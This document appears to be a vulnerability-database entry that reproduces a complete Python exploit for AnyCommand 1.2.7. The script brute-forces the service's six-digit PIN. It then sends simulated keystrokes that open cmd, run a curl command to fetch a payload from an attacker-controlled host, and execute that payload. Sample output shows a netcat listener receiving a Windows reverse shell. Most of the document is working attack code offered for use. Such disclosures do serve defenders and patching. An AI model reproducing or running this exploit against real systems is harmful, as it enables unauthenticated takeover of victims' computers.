📄 AnyCommand 1.2.7 Remote Code Execution

🗓️ 30 Jun 2025 00:00:00Reported by Chokri HammediType
AnyCommand 1.2.7 enables unauthenticated remote code execution via PIN brute force.
# Exploit Title: AnyCommand 1.2.7 - Remote Code Execution
    # Date: 29/06/25
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://anycommand.io/
    # Software Link:
    https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download
    # Version: 1.2.7
    # Tested on: Windows 10
    
    '''
    Description:
    
    AnyCommand 1.2.7 contains critical vulnerabilities enabling unauthenticated
    attackers to achieve remote code execution. The exploit bypasses weak
    6-digit PIN authentication through bruteforcing, then abuses the command
    interface to simulate keystrokes for command execution and payload
    delivery. This two-stage attack (PIN cracking followed by arbitrary command
    execution) requires only network access to the vulnerable service and leads
    to full system compromise.
    
    usage:
    
    
    
    
    python exp.py --bruteforce --host 192.168.8.105
    [*] Bruteforcing PINs from 0 to 999999 (total: 1000000)
    [*] Press Ctrl+C to stop
    [>] Progress: 80.3% | Current PIN: 803429
    [+] SUCCESS! Found PIN: 803477
    [+] Use this PIN: --pin 803477
    
    
    
    python exp.py --pin 803477 --lhost 192.168.8.100 --host 192.168.8.105
    [*] Connected. Authenticating...
    [✓] Authentication successful
    [+] Payload executed. Waiting for connection...
    [+] Exploit completed successfully
    
    nc -lnvp 4444
    Listening on 0.0.0.0 4444
    Connection received on 192.168.8.105 50459
    Microsoft Windows [Version 10.0.19045.5011]
    (c) Microsoft Corporation. All rights reserved.
    
    C:\\Users\\hack>
    
    '''
    
    
    import socket
    import json
    import time
    import argparse
    import sys
    
    def send_line(sock, message):
        sock.sendall((message + "\n").encode())
    
    def send_text(sock, text, delay=0.05):
        for char in text:
            if char == ':':
                send_line(sock, "TYPE::")
            elif char == '&':
                send_line(sock, "TYPE:&")
            elif char == ' ':
                send_line(sock, "KEY:space")
            else:
                send_line(sock, f"KEY:{char}")
            time.sleep(delay)
    
    def recv_quick(sock, timeout=1.0):
    
        sock.settimeout(timeout)
        try:
            data = sock.recv(1024).decode(errors='ignore').strip()
            return data
        except:
            return ""
        finally:
            sock.settimeout(None)
    
    def try_pin(host, port, pin_str):
    
        try:
            sock = socket.socket()
            sock.settimeout(2.0)
            sock.connect((host, port))
    
    
            data = recv_quick(sock)
            if not data:
                return False
    
    
            formats = [
                json.dumps({"pin": pin_str}),
                json.dumps({"auth": {"pin": pin_str}})
            ]
    
            for payload in formats:
                sock.sendall((payload + "\n").encode())
                response = recv_quick(sock)
                if "AUTH_SUCCESS" in response:
                    return True
    
            return False
        except:
            return False
        finally:
            sock.close()
    
    def bruteforce(host, port, start=0, end=999999):
    
        total = end - start + 1
        found_pin = None
        last_update = time.time()
        update_interval = 0.5
    
        print(f"[*] Bruteforcing PINs from {start} to {end} (total: {total})")
        print("[*] Press Ctrl+C to stop")
    
        try:
            for i, pin in enumerate(range(start, end + 1)):
                pin_str = str(pin).zfill(6)
    
    
                current_time = time.time()
                if current_time - last_update > update_interval:
                    progress = (i / total) * 100
                    print(f"\r[>] Progress: {progress:.1f}% | Current PIN:
    {pin_str}", end='', flush=True)
                    last_update = current_time
    
                if try_pin(host, port, pin_str):
                    found_pin = pin_str
                    print(f"\n[+] SUCCESS! Found PIN: {found_pin}")
                    break
    
        except KeyboardInterrupt:
            print("\n[!] Bruteforce interrupted by user")
    
        if not found_pin:
            print("\n[-] Bruteforce completed. No valid PIN found.")
    
        return found_pin
    
    def execute_payload(host, port, pin, lhost, payload):
    
        try:
            sock = socket.create_connection((host, port), timeout=5)
            print("[*] Connected. Authenticating...")
    
    
            if recv_quick(sock) != "AUTH_REQUIRED":
                return False
    
            formats = [
                json.dumps({"pin": pin}),
                json.dumps({"auth": {"pin": pin}})
            ]
    
            for payload_format in formats:
                sock.sendall((payload_format + "\n").encode())
                response = recv_quick(sock)
                if "AUTH_SUCCESS" in response:
                    print("[✓] Authentication successful")
    
    
                    send_line(sock, "KEY:win")
                    time.sleep(1)
                    send_text(sock, "cmd", delay=0.5)
                    time.sleep(1)
                    send_line(sock, "KEY:enter")
                    time.sleep(1)
    
    
                    download_cmd = f"curl {lhost}/{payload} -o
    \\Windows\\Temp\\{payload}"
                    send_text(sock, download_cmd, delay=0.3)
                    time.sleep(0.5)
                    send_line(sock, "KEY:enter")
                    time.sleep(1)
    
    
                    exec_cmd = f"\\Windows\\Temp\\{payload}"
                    send_text(sock, exec_cmd, delay=0.3)
                    time.sleep(0.5)
                    send_line(sock, "KEY:enter")
    
                    print("[+] Payload executed. Waiting for connection...")
                    time.sleep(3)
                    return True
    
            print("[-] Authentication failed")
            return False
        except Exception as e:
            print(f"[!] Error: {e}")
            return False
        finally:
            sock.close()
    
    def main():
        parser = argparse.ArgumentParser(description='AnyCommand Exploit by
    blue0x1(chokri hammedi) \n')
        parser.add_argument('--host', required=True, help='Target IP address')
        parser.add_argument('--port', type=int, default=8000, help='Target
    port')
        parser.add_argument('--lhost', help='Attacker IP for payload delivery')
        parser.add_argument('--payload', default='shell.exe', help='Payload
    filename')
        parser.add_argument('--pin', help='Specific PIN to try')
        parser.add_argument('--bruteforce', action='store_true',
    help='Bruteforce PIN')
    
        args = parser.parse_args()
    
        if args.bruteforce:
    
            found_pin = bruteforce(args.host, args.port, 0, 999999)
            if found_pin:
                print(f"[+] Use this PIN: --pin {found_pin}")
        elif args.pin:
    
            if not args.lhost:
                print("[-] Please specify --lhost for payload delivery")
                sys.exit(1)
    
            if execute_payload(args.host, args.port, args.pin, args.lhost,
    args.payload):
                print("[+] Exploit completed successfully")
            else:
                print("[-] Exploit failed")
        else:
            print("[-] Please specify either --pin or --bruteforce")
            sys.exit(1)
    
    if __name__ == "__main__":
        main()
30 Jun 2025 00:00Current
9High risk
Vulners AI Score9